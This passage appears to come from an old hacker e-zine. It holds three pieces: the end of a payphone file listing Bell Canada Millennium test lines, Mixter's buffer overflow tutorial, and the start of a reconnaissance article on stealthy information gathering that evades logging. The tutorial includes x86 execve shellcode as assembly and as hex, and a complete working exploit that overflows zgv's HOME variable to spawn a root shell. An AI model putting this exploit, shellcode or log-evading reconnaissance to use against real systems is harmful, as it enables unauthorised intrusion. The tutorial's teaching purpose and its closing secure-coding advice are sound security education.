  1337. customers to access their choices quickly. Busy lobbies, cafeterias, convenience
  1338. stores and parking lots are just a few of the many sites where MultiPay
  1339. Terminals easily reach their earning potential.
  1340.  
  1341. The M1241 This advanced terminal can offer consumers more choices, added
  1342. convenience and access to the power of the network. It's the ideal platform,
  1343. allowing smart cards, credit cards and calling cards to drive increased usage
  1344. and revenue. Configured with the RJ-11 integrated data jack, the Millennium
  1345. M1241 MultiPay/MultiApplication Terminal lets you offer easy access to network
  1346. services, e-mail and the Internet to attract callers with laptop computers. Not
  1347. only can you reap additional revenues from the computer calls themselves, the
  1348. terminal's flashing display and Quick Access Keys let you cross-sell your
  1349. products and services to callers during data transactions. Or you can lease
  1350. displays and Quick Access Keys to third-party advertisers for additional
  1351. revenue. The M1241 Terminal also features downloadable code, which allows you to
  1352. make changes and upgrade services without a site visit.
  1353.  
  1354. The M1245 This consumer-friendly terminal can provide information to your
  1355. customers with a touch of a button -- while increasing your revenue. With its
  1356. large graphical display, this terminal becomes much more than a payphone to
  1357. attract people on the move. It's an electronic billboard. Ideal for any
  1358. high-traffic site or any retail delivery location, the M1245 MultiApplication
  1359. Terminal is loaded with features -- but uncluttered and easy to use. And it
  1360. accepts coins as well as cards for added convenience and customer appeal. An
  1361. 8-line x 20-character easy-to-read display catches the attention of passersby,
  1362. providing a strong promotional and advertising medium. Soft keys support
  1363. interactive phone-based transactions. And graphical images that change whenever
  1364. the receiver goes on-hook or off-hook entice the customer to interact -- all at
  1365. the touch of a button.
  1366.  
  1367. The M1361 Millennium Offers an attractive alternative for nontraditional
  1368. payphone locations, such as a waiting room table, lobby counter or the wall in a
  1369. VIP lounge. With its distinctive style and small footprint, the Millennium Desk
  1370. Set delivers all the features, convenience, reliability and security you find in
  1371. Millennium wall-mounted terminals. And it becomes a mobile office -- or home
  1372. away from home - by providing an advanced card reader along with an RJ-11 data
  1373. jack so callers can plug in a laptop computer. An illuminated display and Quick
  1374. Access Keys tell the customer this is more than just a phone. Caller-controlled
  1375. features such as language selection, volume control and a Next Call button make
  1376. using this terminal a comfortable, hassle-free experience.
  1377.  
  1378. The M1400 and M1410 Millennium offers correctional facilities what they need
  1379. most -- flexibility and control of inmate communications. Powerful phone
  1380. monitoring and reporting capabilities provide on-line access to management
  1381. information. That means you can adjust payphone functions - such as curfew
  1382. periods, call duration, and changes to call screening lists or personal
  1383. identification numbers (PINs). And you can make these changes without having to
  1384. call your service provider. The Millennium Inmate System also tackles phone
  1385. fraud and illegal activities head-on with capabilities that provide
  1386. unprecedented control over payphone access and usage. And self-diagnostics built
  1387. into each Millennium Inmate Terminal virtually eliminate out-of-service
  1388. situations.
  1389.  
  1390. The Millennium Kiosk Represents a new way for you to reach your customers at all
  1391. times, allowing you to deliver email accessibility, web browsing, online
  1392. services, the printing of items such as tickets or vouchers and more. The
  1393. Kiosk's advanced design offers robust and ergonomic terminals designed for
  1394. public use, with open application delivery platforms that feature
  1395. non-proprietary, standards-based architecture. Plus, they are easy to maintain
  1396. with network-based administration that allows the centralized management and
  1397. updates of terminals. You can use the Kiosk to take advantage of your Internet
  1398. and Call Center applications knowing that customers can use this public
  1399. communications device to access your organization. That can mean more revenue
  1400. for you because your business never closes and can operate 24 hours a day, 7
  1401. days a week!
  1402.  
  1403. Here is some information and phone number about Nortel that I think some people
  1404. out there might like. There full Corporate name is Nortel Networks Corporation.
  1405. They have Stock Exchanges on New York, Toronto and London stock exchanges. The
  1406. 1998 Revenues were US $17.6 billion and the 1998 Earnings were US $1.07 billion.
  1407. They Employ Approximately 70,000 people worldwide. The CEO is John Roth
  1408. (President and Chief Executive Officer). The CFO is Frank A. Dunn (Senior Vice
  1409. President and Chief Financial Officer). The CIO is Keith Powell (Chief
  1410. Information Officer). The CMO is John A. (Ian) Craig (Executive Vice President
  1411. and Chief Marketing Officer). The CTO is Bill Hawe (Senior Vice President and
  1412. Chief Technology Officer). The Corporate Headquarters is at 8200 Dixie Road,
  1413. Suite 100 Brampton, Ontario L6T 5P6 Canada 905-863-0000
  1414.  
  1415. 1-800-263-7412 Bell Canada Millennium (Help Line) 1-800-567-2448 Bell Canada
  1416. Millennium (Test Line) 1-800-461-1747 Bell Canada Millennium (Voice Test)
  1417. 1-800-461-1879 Bell Canada Millennium (Data Test) 1-800-772-2141 Bell Canada
  1418. Millennium (Setshop) 1-800-668-4862 Bell Canada Millennium (Coin) 1-800-466-7835
  1419. Millennium sales representative 1-214-684-5930 Millennium sales representative
  1420. 1-416-748-2694 Bell Canada, Pay phone Department Well that's all I hope you
  1421. enjoyed the file and you get some good use out of it. I would like to dedicate
  1422. this file to my loving girlfriend without her support I could not of made this
  1423. happen. I would also like to thank all the people who helped me along the way
  1424. with this file you know who you all are. If anyone wants to contact me E-mail me
  1425. at: circuitpimp@hotmail.com
  1426.  
  1427. http://www.ppchq.org
  1428.  
  1429.  
  1430.  
  1431. ==================[Writing Buffer Overflow Exploits]=====================
  1432. ==================[            by mixter           ]=====================
  1433.  
  1434.  
  1435.  
  1436. Buffer overflows in user input dependent buffers have become one of the biggest
  1437. security hazards on the internet and to modern computing in general. This is
  1438. because such an error can easily be made at programming level, and while
  1439. invisible for the user who does not understand or cannot acquire the source
  1440. code, many of those errors are easy to exploit. This paper makes an attempt to
  1441. teach the novice - average C programmer how an overflow condition can be proven
  1442. to be exploitable.
  1443.  
  1444. Mixter
  1445.  
  1446. 1. Memory
  1447.  
  1448. Note: The way I describe it here, memory for a process is organized on most
  1449. computers, however it depends on the type of processor architecture. This
  1450. example is for x86 and also roughly applies to sparc.
  1451.  
  1452. The principle of exploiting a buffer overflow is to overwrite parts of memory
  1453. which aren't supposed to be overwritten by arbitrary input and making the
  1454. process execute this code. To see how and where an overflow takes place, lets
  1455. take a look at how memory is organized. A page is a part of memory that uses its
  1456. own relative addressing, meaning the kernel allocates initial memory for the
  1457. process, which it can then access without having to know where the memory is
  1458. physically located in RAM. The processes memory consists of three sections:
  1459.  
  1460. - code segment, data in this segment are assembler instructions that the
  1461. processor executes. The code execution is non-linear, it can skip code, jump,
  1462. and call functions on certain conditions. Therefore, we have a pointer called
  1463. EIP, or instruction pointer. The address where EIP points to always contains the
  1464. code that will be executed next.
  1465.  
  1466. - data segment, space for variables and dynamic buffers
  1467.  
  1468. - stack segment, which is used to pass data (arguments) to functions and as a
  1469. space for variables of functions. The bottom (start) of the stack usually
  1470. resides at the very end of the virtual memory of a page, and grows down. The
  1471. assembler command PUSHL will add to the top of the stack, and POPL will remove
  1472. one item from the top of the stack and put it in a register. For accessing the
  1473. stack memory directly, there is the stack pointer ESP that points at the top
  1474. (lowest memory address) of the stack.
  1475.  
  1476. 2. Functions
  1477.  
  1478. A function is a piece of code in the code segment, that is called, performs a
  1479. task, and then returns to the previous thread of execution. Optionally,
  1480. arguments can be passed to a function. In assembler, it usually looks like this
  1481. (very simple example, just to get the idea):
  1482.  
  1483. memory address code 0x8054321 <main+x> pushl $0x0 0x8054322 call $0x80543a0
  1484. <function> 0x8054327 ret 0x8054328 leave
  1485. ... 
  1486. 0x80543a0 <function> popl %eax 0x80543a1 addl $0x1337,%eax 0x80543a4 ret
  1487.  
  1488. What happens here? The main function calls function(0); The variable is 0, main
  1489. pushes it onto the stack, and calls the function. The function gets the variable
  1490. from the stack using popl. After finishing, it returns to 0x8054327. Commonly,
  1491. the main function would always push register EBP on the stack, which the
  1492. function stores, and restores after finishing. This is the frame pointer
  1493. concept, that allows the function to use own offsets for addressing, which is
  1494. mostly uninteresting while dealing with exploits, because the function will not
  1495. return to the original execution thread anyways. :-) We just have to know what
  1496. the stack looks like. At the top, we have the internal buffers and variables of
  1497. the function. After this, there is the saved EBP register (32 bit, which is 4
  1498. bytes), and then the return address, which is again 4 bytes. Further down, there
  1499. are the arguments passed to the function, which are uninteresting to us. In this
  1500. case, our return address is 0x8054327. It is automatically stored on the stack
  1501. when the function is called. This return address can be overwritten, and changed
  1502. to point to any point in memory, if there is an overflow somewhere in the code.
  1503.  
  1504. 3. Example of an exploitable program
  1505.  
  1506. Lets assume that we exploit a function like this:
  1507.  
  1508. void lame (void) { char small[30]; gets (small); printf("%s\n", small); } main()
  1509. { lame (); return 0; }
  1510.  
  1511. Compile and disassemble it:  # cc -ggdb blah.c -o blah /tmp/cca017401.o: In
  1512. function `lame':  /root/blah.c:1: the `gets' function is dangerous and should
  1513. not be used.  # gdb blah /* short explanation: gdb, the GNU debugger is used
  1514. here to read the binary file and disassemble it (translate bytes to assembler
  1515. code) */ (gdb) disas main Dump of assembler code for function main:  0x80484c8
  1516. <main>: pushl %ebp 0x80484c9 <main+1>: movl %esp,%ebp 0x80484cb <main+3>: call
  1517. 0x80484a0 <lame> 0x80484d0 <main+8>: leave 0x80484d1<main+9>: ret
  1518.  
  1519. (gdb) disas lame Dump of assembler code for function lame:  /* saving the frame
  1520. pointer onto the stack right before the ret address */ 0x80484a0 <lame>: pushl
  1521. %ebp 0x80484a1 <lame+1>: movl %esp,%ebp /* enlarge the stack by 0x20 or 32. our
  1522. buffer is 30 characters, but the memory is allocated 4byte-wise (because the
  1523. processor uses 32bit words) this is the equivalent to: char small[30]; */
  1524. 0x80484a3 <lame+3>: subl $0x20,%esp /* load a pointer to small[30] (the space on
  1525. the stack, which is located at virtual address 0xffffffe0(%ebp)) on the stack,
  1526. and call the gets function: gets(small); */ 0x80484a6 <lame+6>: leal
  1527. 0xffffffe0(%ebp),%eax 0x80484a9 <lame+9>: pushl %eax 0x80484aa <lame+10>: call
  1528. 0x80483ec <gets> 0x80484af <lame+15>: addl $0x4,%esp /* load the address of
  1529. small and the address of "%s\n" string on stack and call the print function:
  1530. printf("%s\n", small); */ 0x80484b2 <lame+18>: leal 0xffffffe0(%ebp),%eax
  1531. 0x80484b5 <lame+21>: pushl %eax 0x80484b6 <lame+22>: pushl $0x804852c 0x80484bb
  1532. <lame+27>: call 0x80483dc <printf> 0x80484c0 <lame+32>: addl $0x8,%esp /* get
  1533. the return address, 0x80484d0, from stack and return to that address. you don't
  1534. see that explicitly here because it is done by the CPU as 'ret' */ 0x80484c3 :
  1535. leave 0x80484c4 : ret End of assembler dump.
  1536.  
  1537. 3a. Overflowing the program # ./blah xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  1538. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx # ./blah xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  1539. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Segmentation fault (core dumped) # gdb blah
  1540. core (gdb) info registers eax: 0x24 36 ecx: 0x804852f 134513967 edx: 0x1 1 ebx:
  1541. 0x11a3c8 1156040 esp: 0xbffffdb8 -1073742408 ebp: 0x787878 7895160
  1542.  
  1543. EBP is 0x787878, this means that we have written more data on the stack than the
  1544. input buffer could handle. 0x78 is the hex representation of 'x'. The process
  1545. had a buffer of 32 bytes maximum size. We have written more data into memory
  1546. than allocated for user input and therefore overwritten EBP and the return
  1547. address with 'xxxx', and the process tried to resume execution at address
  1548. 0x787878, which caused it to get a segmentation fault.
  1549.  
  1550. 3b. Changing the return address
  1551.  
  1552. Lets try to exploit the program to return to lame() instead of return. We have
  1553. to change return address 0x80484d0 to 0x80484cb, that is all. In memory, we
  1554. have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET Here is a simple
  1555. program to put the 4byte return address into a 1byte character buffer:  main() {
  1556. int i=0; char buf[44]; for (i=0;i<=40;i+=4) *(long *) &buf[i] = 0x80484cb;
  1557. puts(buf); } # ret ╦╦╦╦╦╦╦╦╦╦╦,
  1558.  
  1559. # (ret;cat)|./blah test ╦╦╦╦╦╦╦╦╦╦╦,test test test
  1560.  
  1561. Here we are, the program went through the function two times. If an overflow is
  1562. present, the return address of functions can be changed to alter the programs
  1563. execution thread.
  1564.  
  1565. 4. Shellcode
  1566.  
  1567. To keep it simple, shellcode is simply assembler commands, which we write on the
  1568. stack and then change the retun address to return to the stack. Using this
  1569. method, we can insert code into a vulnerable process and then execute it right
  1570. on the stack. So, lets generate insertable assembler code to run a shell. A
  1571. common system call is execve(), which loads and runs any binary, terminating
  1572. execution of the current process. The manpage gives us the usage: int execve
  1573. (const char *filename, char *const argv [], char *const envp[]); Lets get the
  1574. details of the system call from glibc2:  # gdb /lib/libc.so.6 (gdb) disas execve
  1575. Dump of assembler code for function execve:  0x5da00 <execve&lgt;: pushl %ebx
  1576.  
  1577.  
  1578. /* this is the actual syscall. before a program would call execve, it would push
  1579. the arguments in reverse order on the stack: **envp, **argv, *filename */ /* put
  1580. address of **envp into edx register */ 0x5da01 <execve+1>: movl
  1581. 0x10(%esp,1),%edx /* put address of **argv into ecx register */ 0x5da05
  1582. <execve+5>: movl 0xc(%esp,1),%ecx /* put address of *filename into ebx register
  1583. */ 0x5da09 <execve+9>: movl 0x8(%esp,1),%ebx /* put 0xb in eax register; 0xb ==
  1584. execve in the internal system call table */ 0x5da0d <execve+13>: movl $0xb,%eax
  1585. /* give control to kernel, to execute execve instruction */ 0x5da12 <execve+18>:
  1586. int $0x80
  1587.  
  1588. 0x5da14 <execve+20>: popl %ebx 0x5da15 <execve+21>: cmpl $0xfffff001,%eax
  1589. 0x5da1a <execve+26>: jae 0x5da1d <__syscall_error> 0x5da1c <execve+28>: ret End
  1590. of assembler dump.
  1591.  
  1592. 4a. making the code portable
  1593.  
  1594. We have to apply a trick to be able to make shellcode without having to
  1595. reference the arguments in memory the conventional way, by giving their exact
  1596. address on the memory page, which can only be done at compile time. Once we can
  1597. estimate the size of the shellcode, we can use the instructions jmp <bytes> and
  1598. call <bytes> to go a specified number of bytes back or forth in the execution
  1599. thread. Why use a call? We have the opportunity that a CALL will automatically
  1600. store the return address on the stack, the return address being the next 4 bytes
  1601. after the CALL instruction. By placing a variable right behind the call, we
  1602. indirectly push its address on the stack without having to know it.
  1603.  
  1604.  
  1605. 0 jmp <Z> (skip Z bytes forward) 2 popl %esi
  1606. ... put function(s) here ... 
  1607. Z call <-Z+2> (skip 2 less than Z bytes backward, to POPL) Z+5 .string (first
  1608. variable)
  1609.  
  1610. (Note: If you're going to write code more complex than for spawning a simple
  1611. shell, you can put more than one .string behind the code. You know the size of
  1612. those strings and can therefore calculate their relative locations once you know
  1613. where the first string is located.)
  1614.  
  1615. 4b. the shellcode
  1616.  
  1617.  
  1618. global code_start /* we'll need this later, dont mind it */ global code_end
  1619. .data 
  1620. code_start:  jmp 0x17 popl %esi movl %esi,0x8(%esi) /* put address of **argv
  1621. behind shellcode,
  1622.  
  1623. 0x8 bytes behind it so a /bin/sh has place */ xorl %eax,%eax /* put 0 in %eax */
  1624. movb %eax,0x7(%esi) /* put terminating 0 after /bin/sh string */ movl
  1625. %eax,0xc(%esi) /* another 0 to get the size of a long word */ my_execve:  movb
  1626. $0xb,%al /* execve( */ movl %esi,%ebx /* "/bin/sh", */ leal 0x8(%esi),%ecx /* &
  1627. of "/bin/sh", */ xorl %edx,%edx /* NULL */ int $0x80 /* ); */ call -0x1c
  1628. .string "/bin/shX" /* X is overwritten by movb %eax,0x7(%esi) */ 
  1629. code_end:
  1630.  
  1631. (The relative offsets 0x17 and -0x1c can be gained by putting in 0x0, compiling,
  1632. disassembling and then looking at the shell codes size.)
  1633.  
  1634. This is already working shellcode, though very minimal. You should at least
  1635. disassemble the exit() syscall and attach it (before the 'call'). The real art
  1636. of making shellcode also consists of avoiding any binary zeroes in the code
  1637. (indicates end of input/buffer very often) and modify it for example, so the
  1638. binary code does not contain control or lower characters, which would get
  1639. filtered out by some vulnerable programs. Most of this stuff is done by
  1640. self-modifying code, like we had in the movb %eax,0x7(%esi) instruction. We
  1641. replaced the X with \0, but without having a \0 in the shellcode initially...
  1642.  
  1643. Lets test this code... save the above code as code.S (remove comments) and the
  1644. following file as code.c:  extern void code_start(); extern void code_end();
  1645. #include <stdio.h> main() { ((void (*)(void)) code_start)(); }
  1646.  
  1647. # cc -o code code.S code.c # ./code bash#
  1648.  
  1649. You can now convert the shellcode to a hex char buffer. Best way to do this is,
  1650. print it out:  #include <stdio.h> extern void code_start(); extern void
  1651. code_end(); main() { fprintf(stderr,"%s",code_start); }
  1652.  
  1653. and parse it through aconv -h or bin2c.pl, those tools can be found at:
  1654. http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity
  1655.  
  1656. 5. Writing an exploit
  1657.  
  1658. Let us take a look at how to change the return address to point to shellcode put
  1659. on the stack, and write a sample exploit. We will take zgv, because that is one
  1660. of the easiest things to exploit out there :)
  1661.  
  1662.  
  1663. # export HOME=`perl -e 'printf "a" x 2000'` # zgv Segmentation fault (core
  1664. dumped) # gdb /usr/bin/zgv core #0 0x61616161 in ?? () (gdb) info register esp
  1665. esp: 0xbffff574 -1073744524
  1666.  
  1667. Well, this is the top of the stack at crash time. It is safe to presume that we
  1668. can use this as return address to our shellcode.
  1669.  
  1670. We will now add some NOP (no operation) instructions before our buffer, so we
  1671. don't have to be 100% correct regarding the prediction of the exact start of our
  1672. shellcode in memory (or even brute forcing it). The function will return onto
  1673. the stack somewhere before our shellcode, work its way through the NOPs to the
  1674. inital JMP command, jump to the CALL, jump back to the popl, and run our code on
  1675. the stack.
  1676.  
  1677. Remember, the stack looks like this: at the lowest memory address, the top of
  1678. the stack where ESP points to, the initial variables are stored, namely the
  1679. buffer in zgv that stores the HOME environment variable. After that, we have the
  1680. saved EBP(4bytes) and the return address of the previous function. We must write
  1681. 8 bytes or more behind the buffer to overwrite the return address with our new
  1682. address on the stack.
  1683.  
  1684. The buffer in zgv is 1024 bytes big. You can find that out by glancing at the
  1685. code, or by searching for the initial subl $0x400,%esp (=1024) in the vulnerable
  1686. function. We will now put all those parts together in the exploit:
  1687.  
  1688. 5a. Sample zgv exploit
  1689.  
  1690. /* zgv v3.0 exploit by Mixter buffer overflow tutorial - http://1337.tsx.org
  1691.  
  1692. sample exploit, works for example with precompiled redhat 5.x/suse 5.x/redhat
  1693. 6.x/slackware 3.x linux binaries */
  1694.  
  1695. #include <stdio.h> #include <unistd.h> #include <stdlib.h>
  1696.  
  1697. /* This is the minimal shellcode from the tutorial */ static char shellcode[]=
  1698. "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
  1699. "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
  1700.  
  1701. #define NOP 0x90 #define LEN 1032 #define RET 0xbffff574
  1702.  
  1703. int main() { char buffer[LEN]; long retaddr = RET; int i;
  1704.  
  1705. fprintf(stderr,"using address 0x%lx\n",retaddr);
  1706.  
  1707. /* this fills the whole buffer with the return address, see 3b) */ for
  1708. (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr;
  1709.  
  1710. /* this fills the initial buffer with NOP's, 100 chars less than the buffer
  1711. size, so the shellcode and return address fits in comfortably */ for
  1712. (i=0;i<(LEN-strlen(shellcode)-100);i++) *(buffer+i) = NOP;
  1713.  
  1714. /* after the end of the NOPs, we copy in the execve() shellcode */
  1715. memcpy(buffer+i,shellcode,strlen(shellcode));
  1716.  
  1717. /* export the variable, run zgv */
  1718.  
  1719. setenv("HOME", buffer, 1); execlp("zgv","zgv",NULL); return 0; }
  1720.  
  1721. /* EOF */
  1722.  
  1723. We now have a string looking like this:
  1724.  
  1725. [ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]
  1726.  
  1727. While zgv's stack looks like this:
  1728.  
  1729. v-- 0xbffff574 is here [ S M A L L B U F F E R ] [SAVED EBP] [ORIGINAL RET]
  1730.  
  1731. The execution thread of zgv is now as follows:
  1732.  
  1733. main ... -> function() -> strcpy(smallbuffer,getenv("HOME")); At this point, zgv
  1734. fails to do bounds checking, writes beyond smallbuffer, and the return address
  1735. to main is overwritten with the return address on the stack. function() does
  1736. leave/ret and the EIP points onto the stack:  0xbffff574 nop 0xbffff575 nop
  1737. 0xbffff576 nop 0xbffff577 jmp $0x24 0xbffff579 popl %esi [... shellcode starts
  1738. here ...] 0xbffff59b call -$0x1c 0xbffff59e .string "/bin/shX"
  1739.  
  1740. Lets test the exploit...  # cc -o zgx zgx.c # ./zgx using address 0xbffff574
  1741. bash# 5b. further tips on writing exploits There are a lot of programs which are
  1742. tough to exploit, but nonetheless vulnerable. However, there are a lot of tricks
  1743. you can do to get behind filtering and such. There are also other overflow
  1744. techniques which do not necessarily include changing the return address at all
  1745. or only the return address. There are so-called pointer overflows, where a
  1746. pointer that a function allocates can be overwritten by an overflow, altering
  1747. the programs execution flow (an example is the RoTShB bind 4.9 exploit), and
  1748. exploits where the return address points to the shells environment pointer,
  1749. where the shellcode is located instead of being on the stack (this defeats very
  1750. small buffers, and Non-executable stack patches, and can fool some security
  1751. programs, though it can only be performed locally). Another important subject
  1752. for the skilled shellcode author is radically self-modifying code, which
  1753. initially only consists of printable, non-white upper case characters, and then
  1754. modifies itself to put functional shellcode on the stack which it executes, etc.
  1755. You should never, ever have any binary zeroes in your shell code, because it
  1756. will most possibly not work if it contains any. But discussing how to sublimate
  1757. certain assembler commands with others would go beyond the scope of this paper.
  1758. I also suggest reading the other great overflow howto's out there, written by
  1759. aleph1, Taeoh Oh and mudge.
  1760.  
  1761. 5c. important note
  1762.  
  1763. You will NOT be able to use this tutorial on Windows or Macintosh. Do NOT ask me
  1764. for cc.exe and gdb.exe either! =oP
  1765.  
  1766. 6. Conclusions
  1767.  
  1768. We have learned, that once an overflow is present which is user dependent, it
  1769. can be exploited about 90% of the time, even though exploiting some situations
  1770. is difficult and takes some skill. Why is it important to write exploits?
  1771. Because ignorance is omniscient in the software industry. There have already
  1772. been reports of vulnerabilities due to buffer overflows in software, though the
  1773. software has not been updated, or the majority of users didn't update, because
  1774. the vulnerability was hard to exploit and nobody believed it created a security
  1775. risk. Then, an exploit actually comes out, proves and practically enables a
  1776. program to be exploitable, and there is usually a big (neccessary) hurry to
  1777. update it.
  1778.  
  1779. As for the programmer (you), it is a hard task to write secure programs, but it
  1780. should be taken very serious. This is a specially large concern when writing
  1781. servers, any type of security programs, or programs that are suid root, or
  1782. designed to be run by root, any special accounts, or the system itself. Apply
  1783. bounds checking (strn*, sn*, functions instead of sprintf etc.), prefer
  1784. allocating buffers of a dynamic, input-dependent, size, be careful on
  1785. for/while/etc. loops that gather data and stuff it into a buffer, and generally
  1786. handle user input with very much care are the main principles I suggest.
  1787.  
  1788. There has also been made notable effort of the security industry to prevent
  1789. overflow problems with techniques like non-executable stack, suid wrappers,
  1790. guard programs that check return addresses, bounds checking compilers, and so
  1791. on. You should make use of those techniques where possible, but do not fully
  1792. rely on them. Do not assume to be safe at all if you run a vanilla two-year old
  1793. UNIX distribution without updates, but overflow protection or (even more stupid)
  1794. firewalling/IDS. It cannot assure security, if you continue to use insecure
  1795. programs because _all_ security programs are _software_ and can contain
  1796. vulnerabilities themselves, or at least not be perfect. If you apply frequent
  1797. updates _and_ security measures, you can still not expect to be secure, _but_
  1798. you can hope. :-)
  1799.  
  1800. mixter@newyorkoffice.com http://members.tripod.com/mixtersecurity
  1801.  
  1802.  
  1803.  
  1804. ===================[What You Don't Know Will Hurt You]===================
  1805. ===================[     by Larry W. Cashdollar      ]===================
  1806.  
  1807.  
  1808.  
  1809. I. Overview
  1810.  
  1811.    The first stage to a successful network attack is the information gathering
  1812. stage.  The attacker will collect as much information possible on the target
  1813. host in order to generate a vulnerability list.  Relevant to this list will be
  1814. OS type, OS version, services, service daemon versions, network
  1815. topology*,network equipment, firewalls, intrusion detection sensors etc..  The
  1816. purpose of this document is to outline two models of information gathering . 
  1817. The first model is "noisy" where the attacker uses all known resources with
  1818. little reguard for what footprints* might be left on the target.  The second is
  1819. "stealthy". Wherein the attacker uses methods and packages designed to subvert
  1820. logging facilities on the target.  This approach minimizes administrator
  1821. awareness and accountability.  I will examine a few systems, ranging from
  1822. Solaris 2.x Sparc systems to Linux/i386 architectures. I will then discuss how
  1823. we can harden a system to minimize information leakage.
  1824.   
  1825. II. Utilities and Packages
  1826.  
  1827.     The utilities we will use can can range from some common system commands to
  1828. network information gathering packages like nmap. I will list a few below and
  1829. give a brief description of each.  In the resources section you will find sites
  1830. and security indexes where search engines can dig up a myriad of network
  1831. security tools.  These are just a few.
  1832.   
  1833.             System Utilities. 
  1834.   
  1835. Utility Description finger Displays user information or current users logged
  1836. into specified host rusers Same as finger but in more detail showmount Displays
  1837. directories available for mounting via NFS.  rpcinfo Makes a call to rpc server
  1838. and displays information gathered.  dig DNS information gathering tool. Very
  1839. useful.  whois internic database lookup program.  snmpwalk Gather network
  1840. information using the SNMP protocol.  traceroute Show packet path to target
  1841. host.  nslookup Convert ip address to conical and visa versa mail bounce Use a
  1842. bogus recipient to gain information on a target host.
  1843.  
  1844.  
  1845.             Tool packages
  1846.   
  1847. Tool Description netgrep Netgrep scans an ip range for one specific port.  sscan
  1848. Scans multiple vulnerabilities and also uses host gathering techniques.  nmap
  1849. Stealth port scanner with stack fingerprinting ability and source spoofing
  1850. techniques, does xmas,syn,fin and UDP scans.  mscan older version of sscan,
  1851. still kind of fun.  NSS Narrow Security scanner its a perl script which makes it
  1852. nice and portable.  Searches for common vulnerabilities like msadc.pl and
  1853. showcode.asp.  I found it works very well.  CIS Cerebrus internet scanner nessus
  1854. Nessus is a security auditing program that can scan an entire class A subnet for
  1855. multiple DoS attacks,exploits and mis-configurations.  It runs in to parts a
  1856. client and server type application is used where all scanning functions are done
  1857. by the server which are controlled by the client. Nessus scans for many modern
  1858. security issues such as Windows vulnerabilities and various Unix exploits. 
  1859.  
  1860.  
  1861.               Common services.
  1862.  
  1863.  
  1864. Service Description SSH Secure Shell an interactive encrypted shell session like
  1865. telnet.  NFS Network File System allow file systems to be exported across the
  1866. network and mounted on a remote system.  rlogin/rsh/rexec Remote login / Remote
  1867. shell / Remote execute finger Display remote user information and current users
  1868. logged in.  FTP File transfer protocol, transfer binary and ASCII files between
  1869. hosts.  sendmail Mail delivery system between hosts.  WWW World Wide Web a.k.a
  1870. Hyper Text Tranport Protocol. You are looking at it now.  netbios Protocol that
  1871. allows MS networked machines to share resources.  DNS Domain Name Service, used
  1872. to resolve IP addresses to conical names and vise versa.  telnet Start an
  1873. interactive shell on a remote host using the TELNET protocol.  QPOP Pop your
  1874. email off the server to read off-line.  portmap Maps sun rpc services to their
  1875. respective ports (UDP)
  1876.  
  1877.  
  1878.   III. Information
  1879.  
  1880.     Just about any information on a target host is useful in creating a database
  1881. of applicable vulnerabilities. What we are attempting to do is determine what
  1882. services the target offers and if any of them can be exploited to leverage
  1883. access to the system. For example knowing the version of the OS that your target
  1884. host is using can help you find information on exploits or bugs specific to that
  1885. OS.  By limiting what services we are running and what information is available
  1886. we decrease the window of opportunity for the cracker.
  1887.  
  1888. IV. Information Gathering (Noisy)
  1889.  
  1890.     Just about all of the utilities mentioned above will disclose information
  1891.      about the target host. You can piece together parts of a targets network
  1892.      topology by bouncing a bad email off of the server. This can disclose a
  1893.      weather the mail is relayed internally on another host and the type and
  1894.      version of software used to handle internet/exchanged mail.  Using
  1895.      traceroute you can discover network equipment like routers and switches. 
  1896.      Portsan will give you a list of services available on the target host. 
  1897.      These are all common methods adopted by system crackers to gain access to
  1898.      their target.  Their are many packages out there that automate this process
  1899.      of poking, gathering, logging and sorting.  For example Sscan is a utility
  1900.      for crackers and system admins to gather information on target hosts
  1901.      machines also. It scans the host or network for various security problems
  1902.      and checks for vulnerabilities. Nessus is another package that scans a
  1903.      network for problems as it also checks for DoS attacks and poorly
  1904.      configured network equipment like routers and manageable hubs.  Just
  1905.      grabbing banners with telnet or netcat will divulge important information
  1906.      on your target. All of this is fine, but what about more sinister methods
  1907.      of information gathering? What about using information you meant to provide
  1908.      being used against you?  What about the stuff your logs don't catch?
  1909.  
  1910. V. Information Gathering (Stealth)
  1911.  
  1912.     This method uses the common public ports and specially designed utilities to
  1913. gather host, user and system information. When I talk about common public ports
  1914. I am referring to ports that are expected to be accessed by the everyday
  1915. internet user (53*, 80, 25 , 21*). These services can be queried with little or
  1916. no suspicion of the administrator. Some ports have varying degrees of
  1917. noticeably, for example if you do a zone transfer of the target systems dns
  1918. records. This may set off alarms that suspicious activity is at hand, perhaps
  1919. more so then an anonymous ftp connection depending on the site and
  1920. administrators awareness.
  1921.  
  1922.     These stealth utilities like nmap are designed to take advantage of the tcp
  1923. protocol in order to circumvent logging.  This can also be combined with
  1924. protocols that are less common like snmp. An SNMP query can yield information
  1925. like OS type, uptime and machine name*.  Quite a few vendors enable SNMP by
  1926. default and most administrators are unaware of the dangers. More common services
  1927. for example anonymous ftp can be mined for information. It is amazing what one
  1928. can find dumped in /pub on some sites, password files, old sensitive emails,
  1929. product information, system information and user lists.  I once found a Netscape
  1930. Enterprise Digital Certificate for the site I was auditing sitting in /pub
  1931. waiting for its owner to pick it up*.  In cases like this attacker simply
  1932. downloads every readable file hoping to find something interesting.
  1933.  
  1934.     Probably the number one reason to drive system admins to place closed
  1935. networks on to the internet is the desire to implement a web site. In some cases
  1936. the mad dash to get a web page up shoves proper security techniques aside. The
  1937. old saying don't put all of your eggs in one basket applies to security as well,
  1938. anyway back to the mad dash. This usually means that the hosting company will go
  1939. through great lengths to provide a myriad of information to the WWW community.
  1940. This can be a bad thing however, sometimes more information is too much
  1941. information.
  1942.  
  1943. VI. Procedures
  1944.  
  1945.         This is an overview of how to use each package.  For more information
  1946. see the man pages or the package documentation.
  1947.   
  1948.   
  1949.  
  1950. Package Description brscan Broadscan is very simple to use, I plan to add more
  1951. options to it later.  The following will search the given ip range for port 80. 
  1952. $ ./brscan 192.168.2.1 192.168.3.254 80
  1953.  
  1954. smbclient List all shares on WWW, type smbclient for more information on options
